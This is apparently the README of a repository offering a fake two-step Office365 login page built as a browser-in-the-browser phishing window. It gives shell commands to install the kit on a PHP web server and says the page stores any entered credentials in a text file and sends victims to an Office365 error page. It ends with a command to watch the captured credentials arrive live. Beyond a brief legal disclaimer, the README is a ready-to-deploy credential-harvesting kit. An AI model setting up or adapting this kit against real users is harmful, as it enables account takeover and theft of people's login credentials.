This repo contains a fake two-part Office365 login implemented within a Browser-In-The-Browser attack window. It can be used on a web server that supports PHP files. Any entered credentials are saved in /opt/O365-BITB/creds.txt. After logging in, the victim is redirected to an Office365 error page. Follow steps below for a quick and easy setup.
Legal Disclaimer: Usage of this repo for attacking targets without prior consent is illegal. It is the end user's responsiblity to obey applicable local, state and federal laws. Developer assumes no liability for any misuse or damage caused by this repo.
Run the below commands in the /var/www/html folder of your web server.
git clone https://github.com/jakedmurphy1/O365-BITB.git
cd O365-BITB
chmod 666 creds.txt
Move the credentials file into a non-public folder:
mkdir /opt/O365-BITB && mv creds.txt /opt/O365-BITB/creds.txt
Then visit /O365-BITB/index.html in your browser and give it a try! Any gathered credentials will be stored in /opt/O365-BITB/creds.txt
You can watch credentials appear in real-time with a little bash magic:
tail -f /opt/O365-BITB/creds.txt | while read line; do echo $line; sleep 3; done